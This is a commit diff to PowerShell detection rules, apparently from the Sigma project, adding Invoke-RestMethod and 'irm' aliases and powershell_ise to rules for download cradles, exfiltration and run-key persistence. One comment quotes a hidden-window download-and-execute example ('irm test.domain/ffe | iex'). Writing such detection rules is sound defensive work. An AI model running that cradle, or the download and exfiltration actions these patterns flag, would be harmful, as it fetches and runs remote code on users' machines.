Merge PR #5534 from @swachchhanda000 - update PowerShell WebRequest rules

remove: PowerShell Web Download - deprecate duplicate rule in favour of 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d
update: PowerShell Script With File Upload Capabilities - add invoke-restmethod cmdlet
update: Change User Agents with WebRequest - add invoke-restmethod cmdlet
update: Usage Of Web Request Commands And Cmdlets - add invoke-restmethod cmdlet
update: Usage Of Web Request Commands And Cmdlets - ScriptBlock - add invoke-restmethod cmdlet
update: Potential DLL File Download Via PowerShell Invoke-WebRequest - add invoke-restmethod cmdlet
update: PowerShell Download and Execution Cradles - add invoke-restmethod cmdlet
update: Suspicious Invoke-WebRequest Execution With DirectIP - add invoke-restmethod cmdlet
update: Suspicious Invoke-WebRequest Execution - add powershell_ise
update: Potential Data Exfiltration Activity Via CommandLine Tools - add invoke-restmethod cmdlet
update: Obfuscated IP Download Activity - add invoke-restmethod cmdlet
update: Suspicious PowerShell In Registry Run Keys - add invoke-restmethod cmdlet

---------

Co-authored-by: phantinuss <79651203+phantinuss@users.noreply.github.com>

deprecated/windows/proc_creation_win_powershell_download_cradles.yml

@@ -1,12 +1,12 @@
 title: PowerShell Web Download
 id: 6e897651-f157-4d8f-aaeb-df8151488385
-status: test
+status: deprecated
 description: Detects suspicious ways to download files or content using PowerShell
 references:
     - https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd
 author: Florian Roth (Nextron Systems)
 date: 2022-03-24
-modified: 2023-01-05
+modified: 2025-07-18
 tags:
     - attack.command-and-control
     - attack.execution

rules/windows/powershell/powershell_script/posh_ps_script_with_upload_capabilities.yml

@@ -8,7 +8,7 @@ references:
     - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.4
 author: frack113
 date: 2022-01-07
-modified: 2023-05-04
+modified: 2025-07-18
 tags:
     - attack.exfiltration
     - attack.t1020
@@ -19,12 +19,18 @@ logsource:
 detection:
     selection_cmdlet:
         ScriptBlockText|contains:
+            - 'Invoke-RestMethod'
             - 'Invoke-WebRequest'
+            - 'irm '
             - 'iwr '
     selection_flag:
         ScriptBlockText|contains:
-            - '-Method Put'
-            - '-Method Post'
+            - '-Method "POST"'
+            - '-Method "PUT"'
+            - '-Method POST'
+            - '-Method PUT'
+            - "-Method 'POST'"
+            - "-Method 'PUT'"
     condition: all of selection_*
 falsepositives:
     - Unknown

rules/windows/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml

@@ -8,7 +8,7 @@ references:
     - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#t1071001---web-protocols
 author: frack113
 date: 2022-01-23
-modified: 2023-01-02
+modified: 2025-07-18
 tags:
     - attack.command-and-control
     - attack.t1071.001
@@ -17,11 +17,15 @@ logsource:
     category: ps_script
     definition: 'Requirements: Script Block Logging must be enabled'
 detection:
-    selection:
-        ScriptBlockText|contains|all:
+    selection_webrequest:
+        ScriptBlockText|contains:
             - 'Invoke-WebRequest'
-            - '-UserAgent '
-    condition: selection
+            - 'Invoke-RestMethod'
+            - ' irm ' # Space before and after to avoid false positives with 'irm' as a variable
+            - 'iwr '
+    selection_useragent:
+        ScriptBlockText|contains: '-UserAgent '
+    condition: all of selection_*
 falsepositives:
     - Unknown
 level: medium

rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml

@@ -10,7 +10,7 @@ references:
     - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell
 author: James Pemberton / @4A616D6573
 date: 2019-10-24
-modified: 2023-01-10
+modified: 2025-07-18
 tags:
     - attack.execution
     - attack.t1059.001
@@ -25,6 +25,7 @@ detection:
             - 'curl '
             - 'Invoke-RestMethod'
             - 'Invoke-WebRequest'
+            - ' irm ' # Space before and after to avoid false positives with 'irm' as a substring
             - 'iwr '
             - 'Net.WebClient'
             - 'Resume-BitsTransfer'

rules/windows/process_creation/proc_creation_win_powershell_download_dll.yml

@@ -1,11 +1,12 @@
 title: Potential DLL File Download Via PowerShell Invoke-WebRequest
 id: 0f0450f3-8b47-441e-a31b-15a91dc243e2
 status: test
-description: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet
+description: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest or Invoke-RestMethod cmdlets.
 references:
     - https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution
 author: Florian Roth (Nextron Systems), Hieu Tran
 date: 2023-03-13
+modified: 2025-07-18
 tags:
     - attack.command-and-control
     - attack.execution
@@ -17,7 +18,9 @@ logsource:
 detection:
     selection:
         CommandLine|contains:
+            - 'Invoke-RestMethod '
             - 'Invoke-WebRequest '
+            - 'IRM '
             - 'IWR '
         CommandLine|contains|all:
             - 'http'

rules/windows/process_creation/proc_creation_win_powershell_download_iex.yml

@@ -7,7 +7,7 @@ references:
     - https://labs.withsecure.com/publications/fin7-target-veeam-servers
 author: Florian Roth (Nextron Systems)
 date: 2022-03-24
-modified: 2023-05-04
+modified: 2025-07-18
 tags:
     - attack.execution
     - attack.t1059
@@ -21,6 +21,8 @@ detection:
             - '.DownloadFile('
             - 'Invoke-WebRequest '
             - 'iwr '
+            - 'Invoke-RestMethod '
+            - 'irm ' #powershell -ep bypass -w h -c irm test.domain/ffe | iex
     selection_iex:
         CommandLine|contains:
             - ';iex $'

rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml

@@ -15,16 +15,20 @@ logsource:
 detection:
     selection_img:
         - Image|endswith:
+              - '\powershell_ise.exe'
               - '\powershell.exe'
               - '\pwsh.exe'
         - OriginalFileName:
+              - 'powershell_ise.EXE'
               - 'PowerShell.EXE'
               - 'pwsh.dll'
     selection_commands:
         CommandLine|contains:
             # These are all aliases of Invoke-WebRequest
             - 'curl '
+            - 'Invoke-RestMethod'
             - 'Invoke-WebRequest'
+            - ' irm ' # Space before and after to avoid false positives with 'irm' as a substring
             - 'iwr '
             - 'wget '
     selection_ip:

rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml

@@ -9,7 +9,7 @@ references:
     - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/
 author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022-08-02
-modified: 2024-02-23
+modified: 2025-07-18
 tags:
     - attack.command-and-control
     - attack.t1105
@@ -19,9 +19,11 @@ logsource:
 detection:
     selection_img:
         - Image|endswith:
+              - '\powershell_ise.exe'
               - '\powershell.exe'
               - '\pwsh.exe'
         - OriginalFileName:
+              - 'powershell_ise.EXE'
               - 'PowerShell.EXE'
               - 'pwsh.dll'
     selection_commands:

rules/windows/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml

@@ -6,7 +6,7 @@ references:
     - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/
 author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022-08-02
-modified: 2023-07-27
+modified: 2025-07-18
 tags:
     - attack.execution
     - attack.t1059.001
@@ -16,14 +16,17 @@ logsource:
 detection:
     selection_iwr:
         Image|endswith:
+            - '\powershell_ise.exe'
             - '\powershell.exe'
             - '\pwsh.exe'
             - '\cmd.exe'
         CommandLine|contains:
+            - 'curl '
+            - 'Invoke-RestMethod'
             - 'Invoke-WebRequest'
+            - 'irm '
             - 'iwr '
             - 'wget '
-            - 'curl '
         CommandLine|contains|all:
             - ' -ur' # Shortest possible version of the -uri flag
             - ' -me' # Shortest possible version of the -method flag

rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml

@@ -8,7 +8,7 @@ references:
     - https://twitter.com/fr0s7_/status/1712780207105404948
 author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
 date: 2022-08-03
-modified: 2023-11-06
+modified: 2025-07-18
 tags:
     - attack.discovery
 logsource:
@@ -19,6 +19,8 @@ detection:
         CommandLine|contains:
             - 'Invoke-WebRequest'
             - 'iwr '
+            - 'Invoke-RestMethod'
+            - 'irm '
             - 'wget '
             - 'curl '
             - 'DownloadFile'

rules/windows/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml

@@ -7,6 +7,8 @@ related:
       type: obsolete
     - id: cd5c8085-4070-4e22-908d-a5b3342deb74
       type: obsolete
+    - id: 6e897651-f157-4d8f-aaeb-df8151488385
+      type: obsolete
 status: test
 description: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine
 references:
@@ -15,7 +17,7 @@ references:
     - https://learn.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps
 author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
 date: 2019-10-24
-modified: 2023-01-10
+modified: 2025-07-18
 tags:
     - attack.execution
     - attack.t1059.001
@@ -29,6 +31,7 @@ detection:
             - 'curl '
             - 'Invoke-RestMethod'
             - 'Invoke-WebRequest'
+            - ' irm ' # Space before and after to avoid false positives with 'irm' as a substring
             - 'iwr '
             - 'Net.WebClient'
             - 'Resume-BitsTransfer'

rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml

@@ -1,4 +1,4 @@
-title: Suspicious Powershell In Registry Run Keys
+title: Suspicious PowerShell In Registry Run Keys
 id: 8d85cf08-bf97-4260-ba49-986a2a65129c
 status: test
 description: Detects potential PowerShell commands or code within registry run keys
@@ -8,7 +8,7 @@ references:
     - https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
 author: frack113, Florian Roth (Nextron Systems)
 date: 2022-03-17
-modified: 2025-02-17
+modified: 2025-07-18
 tags:
     - attack.persistence
     - attack.t1547.001
@@ -40,6 +40,8 @@ detection:
             - 'ICM -'
             - 'Invoke-WebRequest'
             - 'IWR '
+            - 'Invoke-RestMethod'
+            - 'IRM '
             - ' -noni '
             - ' -noninteractive '
     condition: selection